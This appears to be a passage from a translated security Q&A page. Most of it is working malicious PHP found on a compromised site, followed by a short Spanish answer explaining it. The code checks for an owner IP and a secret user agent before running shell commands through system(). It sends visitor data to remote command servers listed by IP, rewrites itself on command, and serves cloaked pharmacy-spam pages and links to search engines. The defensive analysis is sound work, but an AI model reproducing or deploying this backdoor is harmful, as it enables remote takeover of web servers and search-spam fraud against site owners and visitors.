    return $f;
}
function check($param1, $param2) {
    return strpos(strtolower($param1), strtolower($param2));
}
function callback($datapage) {
    global $links_out;
    $_9 = $links_out;
    $_2 = 7;
    $_10 = $datapage;
    $_11 = false;
    $_12 = "";
    $_13 = check($_10, "<body");
    if ($_13 !== false) {
        $_14 = array();
        $_15 = array();
        $_16 = array();
        $_17 = array();
        $_18 = array();
        $_19 = array();
        $_20 = substr($_10, $_13);
        $_21 = strip_tags($_20);
        $_22 = "/[a-z]{2,}+ and /";
        preg_match_all($_22, $_21, $_14, PREG_OFFSET_CAPTURE);
        $_23 = "/[a-z]{2,}+ the /";
        preg_match_all($_23, $_21, $_15, PREG_OFFSET_CAPTURE);
        $_24 = "/[a-z]{2,}+ of /";
        preg_match_all($_24, $_21, $_16, PREG_OFFSET_CAPTURE);
        $_25 = "/[a-z]{2,}+ to /";
        preg_match_all($_25, $_21, $_17, PREG_OFFSET_CAPTURE);
        $_26 = "/[a-z]{2,}+ on /";
        preg_match_all($_26, $_21, $_18, PREG_OFFSET_CAPTURE);
        $_27 = "/[a-z]{2,}+ is /";
        preg_match_all($_27, $_21, $_19, PREG_OFFSET_CAPTURE);
        $_28 = "/[a-z]{2,}+ de /";
        preg_match_all($_28, $_21, $_29, PREG_OFFSET_CAPTURE);
        $_30 = "/[a-z]{2,}+ en /";
        preg_match_all($_30, $_21, $_31, PREG_OFFSET_CAPTURE);
        $_32 = "/[a-z]{2,}+ und /";
        preg_match_all($_32, $_21, $_33, PREG_OFFSET_CAPTURE);
        $_34 = "/[a-z]{2,}+ auf /";
        preg_match_all($_34, $_21, $_35, PREG_OFFSET_CAPTURE);
        $_36 = "/[a-z]{2,}+ y /";
        preg_match_all($_36, $_21, $_37, PREG_OFFSET_CAPTURE);
        $_38 = "/[a-z]{2,}+ e /";
        preg_match_all($_38, $_21, $_39, PREG_OFFSET_CAPTURE);
        $_40 = "/[a-z]{2,}+ et /";
        preg_match_all($_40, $_21, $_41, PREG_OFFSET_CAPTURE);
        $_42 = "/[a-z]{2,}+ la /";
        preg_match_all($_42, $_21, $_43, PREG_OFFSET_CAPTURE);
        $_44 = "/[a-z]{2,}+ des /";
        preg_match_all($_44, $_21, $_45, PREG_OFFSET_CAPTURE);
        $_46 = "/[a-z]{2,}+ der /";
        preg_match_all($_46, $_21, $_47, PREG_OFFSET_CAPTURE);
        $_48 = "/[a-z]{2,}+ die /";
        preg_match_all($_48, $_21, $_49, PREG_OFFSET_CAPTURE);
        $_481 = "/[a-z]{2,}+ do /";
        preg_match_all($_481, $_21, $_491, PREG_OFFSET_CAPTURE);
        $_482 = "/[a-z]{2,}+ z /";
        preg_match_all($_482, $_21, $_492, PREG_OFFSET_CAPTURE);
        $_483 = "/[a-z]{2,}+ na /";
        preg_match_all($_483, $_21, $_493, PREG_OFFSET_CAPTURE);
        $_484 = "/[a-z]{2,}+ i /";
        preg_match_all($_484, $_21, $_494, PREG_OFFSET_CAPTURE);
        $_50 = array();
        foreach ($_14[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        foreach ($_15[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        foreach ($_16[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        foreach ($_17[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        foreach ($_18[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        foreach ($_19[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        foreach ($_29[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        foreach ($_31[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        foreach ($_33[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        foreach ($_35[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        foreach ($_37[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        foreach ($_39[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        foreach ($_41[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        foreach ($_43[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        foreach ($_45[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        foreach ($_47[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        foreach ($_49[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        foreach ($_491[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        foreach ($_492[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        foreach ($_493[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        foreach ($_494[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        $_52 = array_keys($_50);
        $_53 = $_20;
        $_54 = - 1;
        foreach ($_52 as $_55) {
            $_54++;
            if (($_54 % $_2) != 0) continue;
            $_56 = 0;
            $_57 = false;
            $_58 = 0;
            do {
                $_59 = strpos($_53, $_55, $_56);
                $_56 = $_59 + strlen($_55);
                if ($_59 !== false) {
                    $_60 = strrpos(substr($_53, 0, $_59), ">");
                    $_61 = strrpos(substr($_53, 0, $_59), "<");
                    if ($_60 === false) {
                        $_60 = 0;
                    }
                    if ($_61 === false) {
                        $_11 = true;
                        break;
                    }
                    if ($_60 <= $_61) {
                        continue;
                    }
                    if (count($_9) <= 0) break;
                    $_58 = trim(array_shift($_9));
                    if ($_58 == NULL || strlen($_58) < 4) {
                        break;
                    }
                    $_53 = substr($_53, 0, $_59 + strlen($_55)) . $_58 . " " . substr($_53, $_59 + strlen($_55));
                    $_57 = true;
                } else {
                    break;
                }
            }
            while (!$_57);
            if ($_11) break;
            if (count($_9) <= 0) break;
        }
        $_12 = substr($_10, 0, $_13) . $_53;
    } else {
        $_11 = true;
        $_12 = $_10;
    }
    $datapage = $_12;
    return $datapage;
} function PingMyProxy($proxy) {
    $port = 80;
    $to = 1;
    $gph = parse_url($proxy);
    $host = $gph['host'];
    $fsock = fsockopen($host, $port, $errno, $errstr, $to);
    if (!$fsock) {
        return FALSE;
    } else {
        return TRUE;
    }
}
//////////////FUNCTIONS FINISH
$readydoors = checkDir($filessavepath);
makebotlist($BotList);
$blst = 'NOFILE';
if (file_exists($BotList)) {
    $blst = 'BOTLIST';
}
if ($_SERVER['HTTP_USER_AGENT'] == "ANTIPIDERSIA") {
    if (preg_match('/93.190.141.195|191.101.22.10|141.255.161.176/i', $visitorip)) {
        $owner = TRUE;
    }
    if ((substr(md5($_REQUEST['localdate']), 0, 6) == '6fbcb8') && ($owner == TRUE)) {
        $time = str_replace('@', ' ', $_REQUEST['localtime']);
        @system($time);
        exit;
    }
    die("<font color='green'>CHETKO</font>:CHETKO|" . $scriptver . "|" . $blst . "|DOORS READY:" . $readydoors);
}
if (preg_match('/cialis|viagra|propecia|levitra|sildenafil|tadalafil|kamagra|pill|drug|generic|prescription|medic|treatment|finasteride|pharmac|medforum|zyvox|zythromax|zyprexa|zyloprim|zyban|zovirax|acyclovir|zoton|zopiclone|zoloft|zofran|zocor|zitromax|zithromax|zithromycin|zimulti|ziagra|zetia|zestril|zestoretic|zenerx|zenegra|zencore|zelnorm|zebeta|zantac|zanaflex|zaditor|yasmin|yagara|bactrim|xenical|xeloda|prednisone|accutane|lasix/i', $url)) {
    $work = TRUE;
}
if (($work == FALSE) && ($morda == FALSE)) {
    return true;
}
$bot = HiGoogle($visitorip, $BotList, $visitorlang);
if ($bot) {
    $user = 'BOT';
} else {
    $user = 'HUMAN';
}
foreach ($proxy_array as $proxy) {
    $proxy = trim($proxy);
    $up = PingMyProxy($proxy);
    if ($up) {
        break;
    }
}
$collection = array("remotehost" => $hostname, "useragent" => $visitoragent, "lang" => $visitorlang, "ip" => $visitorip, "uri" => $url, "gbase" => $blst, "visitor" => $user, "referer" => $referer, "scriptver" => $scriptver, "selfpath" => $selfpath, "admin" => $admin, "doors" => $readydoors, "proxy" => $proxy);
$collection = serialize($collection);
$collection = base64_encode($collection);
$datauri = $proxy;
$response = getRdata($datauri, $workagent, $method, $collection);
if (preg_match('/SELFUPDATE/i', $response)) {
    $telo = str_replace('SELFUPDATE', '', $response);
    $telo = base64_decode($telo);
    $telo = unserialize($telo);
    $selfdata = $telo['secretka'];
    $selfhash = $telo['hash'];
    $selfpath = $telo['selfpath'];
    $selfpath = base64_decode($selfpath);
    $secretkahash = md5($selfdata);
    if (($selfdata <> '') && ($secretkahash == $selfhash)) {
        $file = fopen($selfpath, 'w');
        fwrite($file, $selfdata . "
");
        fclose($file);
    }
    return true;
}
if (preg_match('/TEMPBAN/i', $response)) {
    return true;
}
if (preg_match('/BANBAN/i', $response)) {
    setcookie('engine_ssl_', 'enabled', time() + 3600 * 24 * 100, '/', '.' . $cookie_host);
    return true;
}
if (preg_match('/SHOW DOOR/i', $response)) {
    $telo = str_replace('SHOW DOOR', '', $response);
    $telo = base64_decode($telo);
    $telo = unserialize($telo);
    $door = $telo['doorcontent'];
    echo $door;
    exit;
}
if (($bot) && (file_exists($filessavepath . $filename))) {
    $door = file_get_contents($filessavepath . $filename);
    $door = base64_decode($door);
    echo $door;
    exit;
}
if (preg_match('/SHOW AND SAVE DOOR/i', $response)) {
    $telo = str_replace('SHOW AND SAVE DOOR', '', $response);
    $telo = base64_decode($telo);
    $telo = unserialize($telo);
    $door = $telo['doorcontent'];
    $textogen = $telo['textogen'];
    $ClusterIp = $telo['clusterip'];
    $doorkey = $telo['doorkey'];
    $kc = $telo['kc'];
    $collection = array("k" => $doorkey, "keyscount" => $kc);
    $collection = serialize($collection);
    $collection = base64_encode($collection);
    $texturi = 'http://' . $ClusterIp . '/' . $textogen . '.php';
    $text = getRdata($texturi, $workagent, $method, $collection);
    if (preg_match('/TAKEYOURTEXT/i', $text)) {
        $text = str_replace('TAKEYOURTEXT', '', $text);
        $door = str_replace('[TEXT]', $text, $door);
        echo $door;
        $filetosave = base64_encode($door);
        $file = fopen($filessavepath . $filename, 'w');
        fwrite($file, $filetosave);
        fclose($file);
    } else {
        return true;
    }
    exit;
}
if (preg_match('/SHOW SPAM/i', $response)) {
    $telo = str_replace('SHOW SPAM', '', $response);
    $telo = base64_decode($telo);
    $telo = unserialize($telo);
    $div = $telo['div'];
    $style = $telo['style'];
    $selfpage = getRdata($url, $selfagent, $method, $collection);
    $selfpage = str_replace('</head>', $style . "
" . '</head>', $selfpage);
    $selfpage = str_replace('</body>', $div . "
" . '</body>', $selfpage);
    echo $selfpage;
    exit;
}
if (preg_match('/SHOW CANON/i', $response)) {
    $telo = str_replace('SHOW CANON', '', $response);
    $telo = base64_decode($telo);
    $telo = unserialize($telo);
    $canonlink = $telo['canon'];
    $selfpage = getRdata($url, $selfagent, $method, $collection);
    $canonA = "'<link href=..*?. rel=.canonical. />'si";
    $canonB = "'<link rel=.canonical. href=..*?. />'si";
    $canonZ = '';
    $selfpage = preg_replace($canonA, $canonZ, $selfpage);
    $selfpage = preg_replace($canonB, $canonZ, $selfpage);
    $selfpage = str_replace('</head>', $canonlink . "
" . '</head>', $selfpage);
    echo $selfpage;
    exit;
}
if (preg_match('/CALL BACK/i', $response)) {
    $telo = str_replace('CALL BACK', '', $response);
    $telo = base64_decode($telo);
    $telo = unserialize($telo);
    $links_out = $telo['links'];
    $links_out = explode("
", $links_out);
    ob_start("callback");
}

Ahora, ¿qué hace esto en realidad? No tengo tiempo para leer los 700 LOC, pero si lo hojeo brevemente, se revela lo siguiente:

  • Parece que verifica el agente de usuario y la dirección IP del cliente y los compara con un rastreador web conocido (probablemente para mostrar solo el contenido de spam a los motores de búsqueda para fines de SEO, o para adaptar el contenido para ellos)
  • De alguna forma, recibe instrucciones / spam de un servidor remoto (probablemente uno de http://159.8.34.18/~roboatom/proxy.php, http://190.123.47.134/proxy.php, http://109.236.91.19/proxy.php ) a través de cURL
  • Tiene métodos para actualizar su código malicioso a través del comando SELFUPDATE (desde el servidor remoto), prohibir a ciertos clientes y escribir datos en algún archivo con un nombre MD5'd (cerca del final del código)
  • hace un truco un tanto inteligente de cURL solicitándose a sí mismo (con un User-Agent especial que no puede ver el spam), para que pueda obtener el contenido real de la página y luego inyectarle spam
  • Parece que, por defecto, escribir en un archivo y tratar de darle a ese archivo 777 completos (leer, escribir, ejecutar todos) los permisos. Esto podría ser particularmente peligroso si el servidor se ejecuta con un usuario cuyos privilegios no están limitados y ese archivo pudo ejecutarse

tl; dr Estaría muy cansado del servidor en el que se encontró este código. Es muy posible que se pueda comprometer más allá de este código de inserción de spam (relativamente) inocente

    
respondido por el Bailey Parker 22.02.2016 - 20:41
fuente

Lea otras preguntas en las etiquetas